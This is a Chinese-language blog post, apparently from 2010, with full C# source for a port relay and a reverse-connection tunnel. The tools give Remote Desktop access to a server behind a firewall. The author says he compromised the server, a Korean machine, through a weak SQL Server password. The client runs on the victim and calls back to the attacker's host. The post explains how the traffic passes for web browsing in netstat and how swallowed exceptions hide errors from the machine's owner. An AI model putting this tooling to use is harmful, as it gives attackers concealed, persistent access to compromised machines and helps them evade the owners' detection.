3389的時(shí)候
例子1:連接a機(jī)器的3389端口連不上,因?yàn)閷?duì)方防火墻或者網(wǎng)關(guān)做了限制,只能訪問(wèn)a機(jī)器的個(gè)別端口比如80。
例子2:連接a機(jī)器的幾乎所有端口都連不上(對(duì)方乃內(nèi)網(wǎng)或者防火墻網(wǎng)關(guān)做了限制),只能1433上去,但是對(duì)方可以連接你的某些端口。
解決
第一種較簡(jiǎn)單,只需要程序在對(duì)方開80,你連接他80,程序收到數(shù)據(jù)后,發(fā)送到他本機(jī)的3389,同時(shí)從他3389收到數(shù)據(jù)后返回到你。程序就是一個(gè)中轉(zhuǎn)站。
using System;
using System.Net.Sockets;
using System.Threading;
namespace PortTransponder
{
class Program
{
static void Main(string[] args)
{
TcpListener tl = new TcpListener(80);//這里開對(duì)方可以被你連接并且未被占用的端口
tl.Start();
while (true)//這里必須用循環(huán),可以接收不止一個(gè)客戶,因?yàn)槲野l(fā)現(xiàn)終端服務(wù)有時(shí)一個(gè)端口不行就換一個(gè)端口重連
{
//下面的意思就是一旦程序收到你發(fā)送的數(shù)據(jù)包后立刻開2個(gè)線程做中轉(zhuǎn)
try
{
TcpClient tc1 = tl.AcceptTcpClient();//這里是等待數(shù)據(jù)再執(zhí)行下邊,不會(huì)100%占用cpu
TcpClient tc2 = new TcpClient("localhost", 3389);
tc1.SendTimeout = 300000;//設(shè)定超時(shí),否則端口將一直被占用,即使失去連接
tc1.ReceiveTimeout = 300000;
tc2.SendTimeout = 300000;
tc2.ReceiveTimeout = 300000;
object obj1 = (object)(new TcpClient[] { tc1, tc2 });
object obj2 = (object)(new TcpClient[] { tc2, tc1 });
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
}
catch { }
}
}
public static void transfer(object obj)
{
TcpClient tc1 = ((TcpClient[])obj)[0];
TcpClient tc2 = ((TcpClient[])obj)[1];
NetworkStream ns1 = tc1.GetStream();
NetworkStream ns2 = tc2.GetStream();
while (true)
{
try
{
//這里必須try catch,否則連接一旦中斷程序就崩潰了,要是彈出錯(cuò)誤提示讓機(jī)主看見(jiàn)那就囧了
byte[] bt = new byte[10240];
int count = ns1.Read(bt, 0, bt.Length);
ns2.Write(bt, 0, count);
}
catch
{
ns1.Dispose();
ns2.Dispose();
tc1.Close();
tc2.Close();
break;
}
}
}
}
}
這樣在對(duì)方機(jī)器執(zhí)行和,直接mstsc /v:對(duì)方ip:80就能終端上去了。
第二種稍微復(fù)雜一點(diǎn),需要客戶機(jī)和服務(wù)器2個(gè)程序,你在自己機(jī)器上開服務(wù)器端,在對(duì)方機(jī)器上執(zhí)行客戶端連接你的服務(wù)器端,一旦連接上你的服務(wù)器端再開個(gè)端口讓終端程序連接,對(duì)方機(jī)器上客戶端再開個(gè)端口連接他自己的3389,做2次中轉(zhuǎn)就可以終端上去了。
具體流程
本機(jī)ip開8080端口
對(duì)方機(jī)器連接你的8080端口,比如端口是49908
連接成功后
你的機(jī)器再開一個(gè)比如9833端口
對(duì)方機(jī)器再開一個(gè)連接連接他自己的3389,比如端口是49909吧
好這時(shí)你用你的mstsc連接自己的 localhost:9833,數(shù)據(jù)包就從本機(jī)9833-本機(jī)8080-對(duì)方49908-對(duì)方49909-對(duì)方3389,對(duì)方3389的數(shù)據(jù)反著回來(lái)就行了。
//服務(wù)器端
using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Threading;
namespace fanxiangserver
{
class Program
{
public static Dictionary dic = new Dictionary();
public static NetworkStream kongzhins = null;
static void Main(string[] args)
{
ThreadPool.QueueUserWorkItem(new WaitCallback(start1));
ThreadPool.QueueUserWorkItem(new WaitCallback(start2));
WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });
}
public static void start1(object obj)
{
TcpListener tl = new TcpListener(8080);//開一個(gè)對(duì)方可以連接的端口,今天這棒子機(jī)器連他只能1433,其他連不上,他連別人只能80 8080 21
tl.Start();
while (true)
{
TcpClient tc = tl.AcceptTcpClient();
jieshou(tc);
}
}
public static void start2(object obj)
{
TcpListener tl = new TcpListener(9833); //開一個(gè)隨意端口讓自己的mstsc連。
tl.Start();
while (true)
{
TcpClient tc = tl.AcceptTcpClient();
Random rnd = new Random();
int biaoji = rnd.Next(1000000000, 2000000000);
dic.Add(biaoji, tc);
byte[] bt = BitConverter.GetBytes(biaoji);
kongzhins.Write(bt, 0, bt.Length);
}
}
public static void jieshou(TcpClient tc)
{
//這里體現(xiàn)的是一個(gè)配對(duì)的問(wèn)題,自己體會(huì)一下吧
NetworkStream ns = tc.GetStream();
byte[] bt = new byte[4];
int count = ns.Read(bt, 0, bt.Length);
if (count == 2 && bt[0] == 0x6f && bt[1] == 0x6b)
{
kongzhins = ns;
}
else
{
int biaoji = BitConverter.ToInt32(bt, 0);
lianjie(biaoji, tc);
}
}
public static void lianjie(int biaoji, TcpClient tc1)
{
TcpClient tc2 = null;
if (dic.ContainsKey(biaoji))
{
dic.TryGetValue(biaoji, out tc2);
dic.Remove(biaoji);
tc1.SendTimeout = 300000;
tc1.ReceiveTimeout = 300000;
tc2.SendTimeout = 300000;
tc2.ReceiveTimeout = 300000;
object obj1 = (object)(new TcpClient[] { tc1, tc2 });
object obj2 = (object)(new TcpClient[] { tc2, tc1 });
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
}
}
public static void transfer(object obj)
{
TcpClient tc1 = ((TcpClient[])obj)[0];
TcpClient tc2 = ((TcpClient[])obj)[1];
NetworkStream ns1 = tc1.GetStream();
NetworkStream ns2 = tc2.GetStream();
while (true)
{
try
{
//這里必須try catch,否則連接一旦中斷程序就崩潰了,要是彈出錯(cuò)誤提示讓機(jī)主看見(jiàn)那就囧了
byte[] bt = new byte[10240];
int count = ns1.Read(bt, 0, bt.Length);
ns2.Write(bt, 0, count);
}
catch
{
ns1.Dispose();
ns2.Dispose();
tc1.Close();
tc2.Close();
break;
}
}
}
}
}
//客戶端
using System;
using System.Text;
using System.Net.Sockets;
using System.Threading;
namespace fanxiangclient
{
class Program
{
public static NetworkStream kongzhins = null;
static void Main(string[] args)
{
try
{
TcpClient tc = new TcpClient("你的IP", 8080);
kongzhins = tc.GetStream();
byte[] bt = Encoding.Default.GetBytes("ok");//這里發(fā)送一個(gè)連接提示
kongzhins.Write(bt, 0, bt.Length);
jieshou();
WaitHandle.WaitAll(new ManualResetEvent[] { new ManualResetEvent(false) });//這里為什么要這樣呢?我發(fā)現(xiàn)sqlserver執(zhí)行是localsystem賬號(hào)如果console.read()程序馬上退出
}
catch { }
}
public static void jieshou()
{
while (true)
{
byte[] bt = new byte[4];
kongzhins.Read(bt, 0, bt.Length);
TcpClient tc1 = new TcpClient("你的IP", 8080);
TcpClient tc2 = new TcpClient("localhost", 3389);
tc1.SendTimeout = 300000;
tc1.ReceiveTimeout = 300000;
tc2.SendTimeout = 300000;
tc2.ReceiveTimeout = 300000;
tc1.GetStream().Write(bt, 0, bt.Length);
object obj1 = (object)(new TcpClient[] { tc1, tc2 });
object obj2 = (object)(new TcpClient[] { tc2, tc1 });
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj1);
ThreadPool.QueueUserWorkItem(new WaitCallback(transfer), obj2);
}
}
public static void transfer(object obj)
{
TcpClient tc1 = ((TcpClient[])obj)[0];
TcpClient tc2 = ((TcpClient[])obj)[1];
NetworkStream ns1 = tc1.GetStream();
NetworkStream ns2 = tc2.GetStream();
while (true)
{
try
{
byte[] bt = new byte[10240];
int count = ns1.Read(bt, 0, bt.Length);
ns2.Write(bt, 0, count);
}
catch
{
ns1.Dispose();
ns2.Dispose();
tc1.Close();
tc2.Close();
break;
}
}
}
}
}
好,這樣你連接mstsc /v:localhost:9833,后數(shù)據(jù)就經(jīng)過(guò)了好幾轉(zhuǎn)轉(zhuǎn)到了對(duì)方的3389上。這樣即使對(duì)方是內(nèi)網(wǎng)也可以被終端了,而且好處是對(duì)方查看netstat -an看到的是這種東西。
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING
TCP 他的IP:139 0.0.0.0:0 LISTENING
TCP 他的IP:49908 我的IP:8080 ESTABLISHED
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:3389 [::]:0 LISTENING
TCP [::]:5357 [::]:0 LISTENING
TCP [::]:49152 [::]:0 LISTENING
TCP [::]:49153 [::]:0 LISTENING
TCP [::]:49154 [::]:0 LISTENING
TCP [::]:49155 [::]:0 LISTENING
TCP [::]:49156 [::]:0 LISTENING
TCP [::]:49157 [::]:0 LISTENING
TCP [::1]:3389 [::1]:49909 ESTABLISHED
TCP [::1]:49909 [::1]:3389 ESTABLISHED
UDP 0.0.0.0:123 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1434 *:*
UDP 0.0.0.0:3702 *:*
UDP 0.0.0.0:3702 *:*
UDP 0.0.0.0:4500 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:64966 *:*
UDP 他的IP:137 *:*
UDP 他的IP:138 *:*
UDP [::]:123 *:*
UDP [::]:500 *:*
UDP [::]:3702 *:*
UDP [::]:3702 *:*
UDP [::]:5355 *:*
UDP [::]:64967 *:*
只能看到他的49908在連接我的8080,就像看網(wǎng)站一樣,要是80就更像了,而49909連接3389一般注意不到,反正沒(méi)有ip地址,這棒子想不到吧,他做的這么變態(tài)的限制都被終端上去了,起因就是sqlserver弱口令和權(quán)限,這個(gè)機(jī)器是win2008,i7 920的u,不明白棒子的網(wǎng)管為什么一點(diǎn)安全知識(shí)都沒(méi)有,而且屢教不改,上次進(jìn)去一看,那機(jī)器已經(jīng)被國(guó)內(nèi)黑克給x了n遍了,上邊布滿了木馬,最后實(shí)在啟動(dòng)不了了,他重裝了,結(jié)果那個(gè)sqlserver還是那個(gè)權(quán)限還是那個(gè)密碼,服氣吧。但是如果netstat -ano發(fā)現(xiàn)連我的pid和連3389的pid是一個(gè)那就可以發(fā)現(xiàn)了。
以上程序都是經(jīng)我測(cè)試后非常ok的,但是沒(méi)有經(jīng)過(guò)優(yōu)化,尤其是反向連接的,可以做成個(gè)服務(wù)是吧,或者連接的時(shí)候加個(gè)驗(yàn)證啦什么的,還有我的Ip地址也是變的,可以做成個(gè)服務(wù),定時(shí)讀取某一網(wǎng)頁(yè)上我的新ip,告訴他連還是不連啦,什么的。而且還可以做成個(gè)http代理翻wall啦,總之花樣是很多的。
2010年9月10日下午18點(diǎn)更正反向連接的一個(gè)小問(wèn)題,即連接配對(duì)的問(wèn)題,這樣的話只要肉雞反向連接到你的服務(wù)器端,你可以開多個(gè)終端上去用不同的賬號(hào)同時(shí)登陸了。
看到好多人說(shuō)cpu占用率高什么的,我補(bǔ)充一句,我給出代碼的目的是告訴大家端口轉(zhuǎn)發(fā)的方法和思路,并不是讓你直接粘過(guò)去用,如果那樣的話我直接編譯成exe不就完了嗎,授人以魚不如授人以漁對(duì)吧,所以大家看明白了怎么回事自己去改和優(yōu)化,像緩沖區(qū)大小是否合適啦,超時(shí)啦,連接判斷啦什么的,這些都是要自己去優(yōu)化的,所以代碼很短嘛,就是為了讓大家看的簡(jiǎn)單明了,所以直接用的話效率不會(huì)很高,但這是個(gè)完整骨架,我自己用的就在這段骨架的基礎(chǔ)上優(yōu)化并增加了很多功能,而且cpu占用率內(nèi)存占用都是沒(méi)有問(wèn)題的。
400 186 1886
